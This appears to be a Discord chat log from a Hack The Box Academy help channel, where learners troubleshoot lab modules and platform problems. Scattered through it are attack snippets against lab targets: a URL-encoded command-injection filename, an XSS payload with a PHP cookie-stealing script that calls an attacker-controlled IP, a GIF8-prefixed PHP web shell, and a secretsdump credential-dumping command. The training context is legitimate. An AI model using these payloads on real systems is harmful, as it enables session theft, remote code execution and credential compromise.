nmap --proxies http://127.0.0.1:8080 SERVER_IP -pPORT -Pn -sC
plzz guide me
Do you have Burpsuite Community Edition open?
let me know if you were able to get the flag or need more help 🙂
%74%65%73%74%25%33%42%63%70%2b%2f%66%6c%61%67%2e%74%78%74%2b%2e%2f like this
i used burp encoder
encoded this test%3Bcp+/flag.txt+./
the section provides you with enough information to go through the exercise, you don't need proxychains
I would try the following,
- copy the filename from the question
- open the File Manager page in the webbrowser
- paste the filename in the New File Name text box, press enter
- Send it to burp repeater
- burp verb tamper (like mentioned on the page)
- Send the request
- refresh your browser
alright . proxychains curl http://SERVER_IP:PORT
so this server_ip : port should be 127.0.0.1:8080 or the target ip
Any help here guys
i guess there is the issue in backed am not getting the request like in example. i can also modify the request but not accepting and showing only 200k with listing notes.txt
Turn intercept off and press enter when submitting
Don’t press the button
[-] 127.0.0.1: Error: Transport endpoint is not connected - getpeername(2)
[-] 127.0.0.1: File doesn't seem to exist. The upload probably failed
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
i tried every method from last 3 hours but i was just clicking on reset button but it was all about pressing enter
thanks a lot mate. nice to see you 🙂
I am in the Intro to c2 operations with sliver module and was wondering if anyone can explain to me why does the getsystem command not work
Glad I could help
check systeminfo
I’ll be back in a bit. Need to run to the store real quick
Sorry, I still dont get it. I also had another question- when I used execute-assembly with godpotato here it failed to create process. But when I used donut to create shellcode and used execute-shellcode it successfully worked. Why did it fail with execute-assembly?
Regarding the optional exercise at the end of the Documentation and Reporting module, where we can submit a draft report for constructive feedback, is that still an offered service by the HTB team? I know they've probably lots of actual exam reports to work through, wouldn't want to add more to their plate
dude don't ping mods here, just wait for support
pinging mods here won't speed it up
wait for support then
Support is the best way to get this resolved
They should be around now
Let me send them a message and see whats up
Patience is a virtue 😇
Frustrating for sure, but lends a good opportunity to try something else or learn something new while waiting. Never a bad thing to expand your knowledge 🙂
Skipping it till you receive support is impossible?
😐
We cant find any tickets from yesterday, last we see was a week ago.
However we do have the recently opened ticket and we'll respond to it shortly.
Are you able to send a screenshot of the ticket you had opened, so we can figure out where it went?
Sorry to hear that but please don't do pings as they usually don't work at HTB
except me and some others
Also, we try our best but can't cover 24hours sadly so please be patient and we can resolve your issue
Best is to DM me the screenshot
anyone having trouble spawning targets?
not at this moment
hmmmm
might just be taking a while if it is a big lab?
its just the beginning of the Windows Privesc labs
worked pretty well a few hours ago. ill prob just try a different vpn in a minute
I have trouble spawning target
I'm on enterprise academy and just opened a new session
i have trouble in spawning target
/genesis API call is showing deploying, and after a few calls (I would say its lasting time is shorter than before), it returns 204 without any target IP
I tried multiple time, but it still does NOT work.
sent
hopefully it comes through soon
No issue spawning machines here. Just spawned a new one
yea mine just fixed itself and is working now
it worked that way with windows client
hey guys ! i’m working on RE private API and i’m stuck in reproducing a protobuf encryption somebody already experienced this ?
Anyone know the term "phishing"
yea most of us are familiar with it ....
What about osint tools?
Does anyone teach this
there is an OSINT course, but its 1 of the more advanced modules
and there is some OSINT on the Information Gathering module as well
Where?
but i dont believe HTB teaches Maltego or OSINTFRAMEWORK
Thanks @sterile solstice
I could not spawn the target does anyone face it?
no problem. I'm looking forward to when I do the OSINT: Corporate Recon module, but its at the highest tier. i can't speak to its contents right now.
It's been spawning for half an hour but still not spawned
my session keeps dropping. it wasn't working for me before

I was just facing it several minutes before. Now I fixed it myself.
Please clean all your browser caches and COOKIES.
then relogin, now it works
far out. i absolutely dread going back to a windows based module. it wont stop dropping. its infuriating.
getting flashbacks to the pivoting module, and pasword attack modules all over again lol
did it finally work? If it spins more than a minute, try refreshing the page.. if it still spins, try changing VPN. Changing VPN forces all spawned/stuck machines to get killed so you can spawn a clean one on the new VPN.
..and yes VPNs are having an impact.. all VMs you spawn, are assigned on the VPN you have selected in /vpn
so far EU5 has treated me well ... but I hope you get an Australian VPN in the future.
module web attacks, Mass IDOR Enumeration.... can someone see what i'm doing wrong here? nothing is returned
Remove your grep
||guys i wanna mention something maybe can be help in the future or maybe i am understanding wrong, but in some sections like this one : https://academy.hackthebox.com/module/81/section/962 , says i need to connect to the live host to capture, i understand i need to connect to the target that is generated from the academy, but the answers are not there, so sometimes is difficult to me understand if i need to go directly to the target or analyse the PCAP, now i solved but is a little bit confusing some times||
alright, let me try
Most likely your grep is removing all the input as it’s not matching
Is there a place to submit minor typo corrections on modules? Maybe in #1234357888114364508 ? Just have been running very minor grammatical things here and there, nothing module breaking
not sure what to do, i'm literally copy pasting from the course, i double checked that it is grepping the right expression .. is it not right ?
Sorry I sent a shark to eat the cables
Which kind?
im guessing theres a pun about wireshark in there haha
And underwater shark? 😮
Idk probably, woke up sicker than a dog so brain isn't firing on all cylinders
I’ll check in a few min. Bear with me
Appreciate it, thank you
ah, damn. yea that sucks lol
I am gonna look now, sorry was having lunch real quick
no worries
Hii! You need to find the proper artifacts that may register information related to what you're looking
Okay so in the examples on the page, the target is working via a GET request. For the exercise, and the spawned target, this is not the case. So in this case, the curl command would indeed not work. You can either do it via Burpsuite or alter the bash script
For example, in the case of the document, try to find an artifact that may be related to documents. Feel free to DM if you need further assistance 😄
is there a place i can find SOAPAction payloads ?
besides whats given in the module?
did anyone solve the attacking thick client application reverse engineering i am unable to find the specified file
the reverse engineering restart-oracleservice.exe
that is based on another retired box, I don't remember the name but you can search around
did but could not get any stuff
I already told you to watch fatty
in fatty he explained and i was able to replicate the steps
but that is for the second question i guess the one for finding the eth0 ip
they're talking about a different section
but i am talking about the first question where we have to reverse engineer the restart-oracleservice.exe
Fatty was thick client right
and find the hardcoded credentials
yes for logging into that java with vulnerable sql code
ah the box is PivotAPI
it's Exploiting Web Vulnerabilities in Thick-Client Applications
the previous section is just Attacking Thick Client Applications
can you come ib once
hello, im doing the Reflected XSS and the flag i have found is saying that its incorrect. Is there anyone who can confirm if my flag is correct?
what
dm
sorry I don't provide module help in dms, and I don't remember much for that section
check the pivotapi box walkthroughs
can anyone check if my flag is wrong? "stored for everyone..."
the flag is the standard flag format, HTB{...}
nope wrong section
oh, yeah, thanks
Module: AD Skill Assessment part 1
Dump LSA & SAM remotely with proxychains doesnt work!? - only locally - any suggestions?
it does tho
If executed nothing happens
have set up chisel on linux and windows machine - seems to work
something is wrong with the pivot or command then, how are you running it
rdp works over proxychains - proxychains python3 secretsdump.py inlanefreight/svc_sql:"......."@172....
`
and what's the output? also why run secretsdump.py with python3? what's wrong with a pip/pipx install
Hello, where can I ask a question to get advice in the learning process?
If this question is related to the academy module, you can ask it here
What would you like to know?
can someone please help me cuz i cant find this file usr/share/dirb/wordlists/common.txt for the web enumeration chapter in getting started
CROSS-SITE SCRIPTING (XSS) Module
Section: Session Hijacking
Try to repeat what you learned in this section to identify the vulnerable input field and find a working XSS payload, and then use the 'Session Hijacking' scripts to grab the Admin's cookie and use it in 'login.php' to get the flag.
My command which works and a request is sent to my server:
"><script src=http://10.10.15.114:80/index3.php></script><script>$.getScript("http://10.10.15.114:80/index3.php")</script>
This is the php script for index3.php:
if (isset($_GET['c'])) {
$list = explode(";", $_GET['c']);
foreach ($list as $key => $value) {
$cookie = urldecode($value);
$file = fopen("cookies.txt", "a+");
fputs($file, "10.149.248.249: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n");
fclose($file);
}
}
?>
I get a request message alert but the index3.php is not getting the cookie. Is there anything I'm doing wrong?
Thanks
<?php
if (isset($_GET['c'])) {
$list = explode(";", $_GET['c']);
foreach ($list as $key => $value) {
$cookie = urldecode($value);
$file = fopen("cookies.txt", "a+");
fputs($file, "10.149.248.249: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n");
fclose($file);
}
}
?>
hey everyone any suggestions for citrix breakout unable to do the admin part
This is what I used and what the module gave me
The fact is that at the moment I am studying the path of Information Security Foundations. Next, I plan to explore the SOC Analyst path. In the process of studying the path Information Security Foundations, in the context I saw the text "which we can learn more about in the Penetration Testing Process module" The question is whether it is worth studying the "Penetration Testing Process" module at the same time? Additional information: I am a former trainee penetration tester, I have basic knowledge of penetration testing.
pipx good hint - machine was broke
@next bronze any suggestions for citrix breakout windows escalation
.
yeah, i just looked for another common.txt somewhere else and used that
try the stuff in the section, run the enum tools once you get user
hello i was learning a Automating Payloads & Delivery with Metasploit on HTB. And then i got this problem. that i can't get the shell but i can ping the victim
hello everyone is it normal not getting any positive req on Broken Authentication Brute-Forcing Password Reset Tokens
If you are familiar with the pentesting process, this module is not absolutely necessary for the SOC path.
i cant send the picture
Thanks, for the answer! +rep
verify your account, read #welcome
But take a look at the SOC Analyst Prerequisites Path
https://academy.hackthebox.com/path/preview/soc-analyst-prerequisites
Sure, after finishing the Information Security Foundations, I'll switch to this.
🙃 if someone can help with this plz
your lhost is incorrect, it should be your vpn ip
how do i get the vpn ip sorry, im very new to this
ip a
or set lhost tun0
What does your list of tokens.txt contain?
0 to 999999
Cuz when i ask for the token i cant get a sample for how the token is generated so i assumed that the token is 6 digits
But if you can't find anything with it, what options do you have?
We have the question befor that says the token is 6 digits
The previous question asks how many possibilities there are with a token with 6 numbers, right?
Think about what that means for traffic.
Can a server process so many requests within a short time?
hello guys, I am having problem while setting up odat for oracle tns enumeration can someone help me through vc?

I have a question. I am working towards the CPTS cert. I finished the Fundamental sections and am moving on to the Network Enum with Nmap. From this point to the end, how many cubes are needed to finish the PT path? Thanks. I am asking to know how many to buy.
The CPTS Path?
I would rec. buying a student sub which is 8$/m and it's cheaper than cubes.
anyone having any hints for documenting and reporting section. Really weak in this part
Yea the CPTS path. OK ill check that out, thanks so much
Yea, the CPTS path is 1960 cubes. Np, get the student one and you good to go. 
Try it with the PwnBox. I have just tried it out. It works perfectly
okay, I'll try!
Step by step guide on how to access the Student Plan.
It worked, thnx mate 🙂
thank you
can someone help me with skill assessment in intro to threat hunting and hunting with elastic
when i try to search in elastic
file.path:"C:\\*"
or anything with * regex wont work for some reason
should it work 😢 im stuck as hell on this today
maybe im doing the wrong thing completely..
Advanced xss and csrf exploitation - cors misconfiguration
Somehow my cookie is not being sent with the request. Im logged into vulnerablesite.htb in another tab and can see my cookie there.
Sorry for photo but I dont have discord on my laptop
Your question is about Hunt 1 ?
yess
they say: Create a KQL query to hunt for "Lateral Tool Transfer" to C:\Users\Public.
so have a look there : )
yeah
but the file.path thingy is not working for me :( im trynna look for that pth like that lol
i just query C:\Users\Public without anything else, if i remember correctly
yup!
i guess file.path is not where that info was logged. you can try process.working.directory
sorry guys where can I find the pro lab dante discord chat?
it says no access
Read and follow #welcome
thanks
<@&861185840277487616> bros spamming in every channel
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
Hey Myk4my. I am also trying to understand this.
Did you figure out a way to bypass the \ filtering?
Module: Password Attacks
Section: Network Services
Currently stuck at accessing the nfs
I mounted the remote nfs as root with
```mount -t nfs 10.129.21.226:/JNFS /mnt/nfs -o nolock```
└─/mnt/nfs 10.129.21.226:/JNFS nfs rw,relatime,vers=3,rsize=32768,wsize=32768,namlen=255,hard,nolock,proto=tcp,timeo=600,retrans=2,sec=sys,mountaddr=10.129.21.226,mountvers=3,mountport=2049,mountproto=udp,local_lock=all,addr=10.129.21.226
But when I try to access the share:
└──╼ #cd /mnt/nfs
bash: cd: /mnt/nfs: Permission denied
I obtained the root in pwnbox via sudo su, I also tried sudo bash and even su - and su root and ever had I able to access anything from JNFS
can someone point out some stupid mistakes I made here ._.
Thank you for your time.
Hi, all. I'm sorry to bother, but I'm banging my head against a wall with the **Attacking Common Applications - Attacking Thick Client Applications** exercise. On the first step in the material, changing permissions for the Temp folder of the user I RDP in as, I get error messages saying the operation "failed to enumerate objects in the container", and the .bat file never shows up. If anyone had a moment, I'd greatly appreciate a little nudge regarding what I'm missing!
anyone can give some suggestions for documenting and reporting. I am unable to accomplish the given task
Hunt 2: Create a KQL query to hunt for "Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder". Enter the content of the registry.value field in the document that is related to the first registry-based persistence action as your answer.
i found using event id 13 two hits
but none of their registry.values are good (the values are the same)
can someone explain something to me
why was the sqli in the api attack section worked "it needed 'OR 1=1' OR 1 statement, why did that drop the table i dont get it
can you approach in dm once please, thanks
anyone who has done the documenting and reporting htb module, kindly just tag me please
i got it, just dont get this question at all. if anyone could help me a lil and explain ill be thankful :)
Anyone that can help with info gathering - web edition - Vhosts please dm me. I have a ss i cant share and cant figure why the host isnt able to validate the base domain
im stuck on the third one with powershell
what is the field that shows DC1.. at the top right corner? 👀
okay i got it nvm
yes
Module: AD skills assessment 1
Connect to DC01 --> last question, any hint how to connect to dc01 or which tool to use?
Setup chisel on linux and windows --> dc01 scanned for open ports --> only smb is open...
there will be other ports open, like kerberos and ldap will need to be running for the domain to even function properly
thought maybe running mimikatz on ms01 --> doesnt work...
do i have to pth from ms01 maybe?
you can just use remote tools
I've been working on the Web Proxies module and I haven't been able to use the ZAP HUD properly even once via Pwnbox. Is anyone else facing this issue? For example, if I click to Start Spidering, it won't work. Even toggling interception won't work.
same here, never managed to make it work, i didnt try very long though
I did the Active Scan through the main UI and it completed. The module said I could view the results under the Alerts tab? However, this tab just shows a list of alerts, how can I properly view alerts just for my target by severity?
It shows me alerts like this. Some of these alerts could belong to other sites as well, but I just wanna see it for my target by severity.
Ahh, I see. Any idea how to view the alerts by severity for just the target site?
bro, i get the answer, answer isnt valid
i removed it to avoid spoiling people
but i am doing the api attack module , and in the file upload section , the question is to get the hostname
i got the hostname copy and paste it but it says its wrong
bro
there was a space 😐
Do i need discord nitro to put pictures in this chat?
it all was cause of a space in the answer i didnt notice
skill-issues
the color of the flags is related to the severity. iirc the red flags go on top automatically.
As for just the target site, i'd say you have to set the scope, or context (? in zap vocabulary?)
lack of braincells issue
Yeah, but doesn't the Alerts tab show the results for all sites in the scope? Any way to view it just for one target in the scope?
The section I'm on "ZAP Scanner", the question says that I should find a high-level vulnerability but the scan didn't find one. Could you give me a nudge in the right direction?
No, read and follow #welcome
Can you please share a hint?
i guess i had set the scope before scanning, so i don't know how to sort those results. Can't try on zap at the moment.
for your other question, if i remember correctly, you have to spider then scan. it really follows the course material
Thank you
I am stuck configuring proxy to 127.0.0.1 for burp. On automate shell module. Can anyone help?
here is the burp settings
Not sure what the issue was, but adding to context and running it a third time worked.
I thought I'd already had it added to scope/context, must've been mistaken.
yeah i remember not having the same results as the course material, but then after retrying i guess i had it as well
Everytime i change the proxy, it will appear as secure connection failed
Can you show me the "secure connection failed" that you're getting?
this one
Install the certificate for Burp.
Thank you so much, it works now
and the firefox extension foxyproxy makes managing proxies easier
yeah that's strange. i just spun up the exercise and it seems the spidering gets the vulnerable endpoint directly. Not sure why it does not work on the first active scan.
You got the vulnerable endpoint without Ajax spidering?
yes
Strange indeed
last question of Skills Assessment - Web Fuzzing:
Try fuzzing the parameters you identified for working values. One of them should return a flag. What is the content of the flag?
Pretty sure I can get it if I could get some help on what wordlist to use.
isn't that the whole crux of web fuzzing?
where are you in your reflection?
found the flag, just had to use a bigger list
nice gg
I added this IP through 'sudo nano' and still can't find the web prefixed domain. Any suggestions
you are doing it wrong
add the ip to /etc/hosts like this 10.10.10.10 inlanefreight.htb
For the creators of the intro to C2 sliver tier three module. I really enjoy it.
Is there any way I can contribute additional information to the sliver module?
I did.
what is the module?
Information Gathering - Web Edition (Virtual Hosts)
if you use --append-domain and use an IP, then you have to specify the domain --domain <domain-name>
maybe you can try gobuster vhost -u http://inlanefreight.htb ?
where would I add that?
Ok ill try this too thank you
in your command
--append-domain --domain inlanefreight.htb
try the command given as an example in the module
don't forget the port
This gave me more so far so thank you. Its still loading tho
This worked. Thank you!
nice, glad for you
both solutions are usable. Either you use an ip:port --append-domain --domain
or the domain:port --append-domain and the ip in /etc/hosts
by the way on your previous picture you got 2 IPs in your /etc/hosts pointing to the same domain, so it will use the 1st I think
Nah, it attempts one then the other
Anyone here who did the advanced xss and csrf module and want to help a sister out? I'm pretty sure its a very small detail I missed
What exactly do you need help with. Big module
It helps if you just ask your question and include the section lol
I did that already and got 0 replies lol
Try again
Don't see your question here
At least not up to 6 hours ago
That's as far back as I felt like scrolling
thank you for that precision. I get it with resolving a domain name, but how will this work with gobuster? will it error? is it good to let both IP? what if that come from another exercise?
it will try first, if it is not responding, it will go to the next one
I mean it will likely produce an error before trying the next one
It's like assigning a backup server
Have you tried without the port?
Https moment
Nah she's using https instead of http
This lab requires https
Does it?
Yes
It’s because of the secure cookie attribute that is being used here
Im doing the cors misconfiguration section.
Im making a request to vulnerablesite.htb/profile.php to fetch the flag.
But for some reason my cookie is not being sent with the request.
The origin and allowed origins are the same and the allow credentials header is true.
I am logged into vulnerablesite.htb so the cookie is in my browser.
Attached code and request/response
If I try making the request without the port number I get cors error cause origin will have the port
Hey all, I'm going through API Attacks module and in Broken Auth, I execute otp n reset password (Got the SuccessStatus: true). Logged-in with Mason email n reset password and received token but on checking Role he has, it says No role assigned. Can someone nudge me in the right direction (feel free to dm)?
Every payload I have in my notes are without port
I dont know how to access the pages without specifying the port number. I cant add port number to the hosts file
Your victim visits your payloads
but ye that could be why it doesnt work
The victim doesn’t need the port
mm well true, Im just trying to make it work for myself right now with my own cookie
Ill try focusing on sending it to the target directly
Okay 🙂
I’ll check my notes and try tomorrow if you’re still stuck. It’s 9pm for me
any idea why I receive this error while running printspoofer? Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
CreateProcessAsUser() failed. Error: 2
Seems to work when I send it to the target, thanks
Glad to hear. Have fun with the rest of the module
@gloomy lichen sup, what port you used for the revshell?
Try GodPotato printspoofer for me is always a hit or miss
Hey whenever I spawn an instance in Pwnbox whenever I go to http://[target IP]:5601 it takes forever to establish the connection, is this normal? Also do i have to install a separate VPN connection file for openvpn every time I make a new instance of pwnbox? (and do I even have to do that in general)
Try https
Also you don't need to run the vpn to use the in-browser vm
In-browser vm connects to the vpn automatically
hey, the good old super sneaky 4444
Okay sweet thank you! is it normal for it to take awhile to establish a connection with the target IP? (usually around 7-10 minutes of reloading the page until it makes the connection after spawning target ip)
Sometimes it takes a few minutes to launch all service
Okay thank you!
Thats strange, I'm doing some tests and not even a single port work, time to restart again then
Nevermind now worked 
I tried the other method.
NVM
Trying to bruteforce a user which is md5 encoded. Tutorial says use ZAP Proxy but i absolutely don't like that tool. Any tool recommendation?
Use burp ig
In a module it explains that the command 'wappalyzer' is used to find CMS, which is what I need, but it says command not found. Am I putting it in wrong?
Wappalyzer is a browser extension
Also it's very hit or miss
What should I use instead to find the CMS?
Ok thank you
I can find the apache and the operating system but I still cant find the content management. Am I still doing something wrong for that?
You need the vhosts
so the end shouldnt be just the ip it should be 10.129.11.33 app.inlanefreight.local dev.inlanefreight.local?
Gotcha ok thanks
if you simply visit the website in your browser, it can give you the answer you're looking for
The exercise is to use cli tools
Not to mention it can be a guess, I can put the default Ubuntu apache html on another system if I wanted to. Security through obscurity
yeah all right and change the favicon as well, it would be just unlikely
It's not labeled flag.txt
I tried that, it doesnt go through, even without the GIF8, I even tried to decode it thinking it's encoded
What is the file you uploaded?
The content of it
the .txt file there echo GIF8
GIF8<?php system($_GET["cmd"]); ?>
apparently, every other command echo GIF8 now, maybe something is wrong, i will reset and restart
That's the one !!!!!!!!!!!!!!!
Thanks dude 😭
But glad you could overcome skill issue
LOLL
everything echo GIF8 then the data, all other command would just echo GIF8, in other words nothin maaaaannn thanks @wraith pelican 😭
It's echoing the prefix
lol sorry for spoiling i didn't know this was the correct thing to cat... i was looking for flagxxxxx.txt as marcie said
Exactly.... that messed me up!
😂 i didnt think it would work too..... until it did 😂
To get you to be mindful about it
I said it's not flag.txt
sorry i should throw rose petals when i speak and marcie is here.. sorry .. sorry
i'll go back in my cave sorry
You should use a newline in future so you can keep them apart
Why can't I talk in the general chat?
You need to verify your account
@ocean night Can you go to my DM for 2 minutes please? To see if you could help me with a few simple questions
Are they questions you cannot ask here?
(or in general etc once you verify)
Also, I'm not support
It's about the scoring system, I already read the platform documents but I haven't reached a conclusion yet.
I'd advise raising a support request with our team via https://help.hackthebox.com then 🙂
Brother, I have been waiting for a response for 2 hours xd
They will come back to you, please be patient.
OK
Any tips on guessing credentials for the KERBEROS ATTACKS skills assessment? Or "finding" them?
Most everything on HTB isn't guessing, but if you need to guess it will be something simple.
Hi! Hope you're doing well! I've just discovered sysreptors and I had some questions. Just to make sure that i've understood everything, "all" we have to do for the CPTS, is to add the findings, appendices, detailed walkthrough etc in the Htb provided sysreptor design right?
Using the provided users.txt list, try to get access to the domain. What's the name of the user whose credentials or hash you found?
Basically yes, and some other stuff like filling in name and such
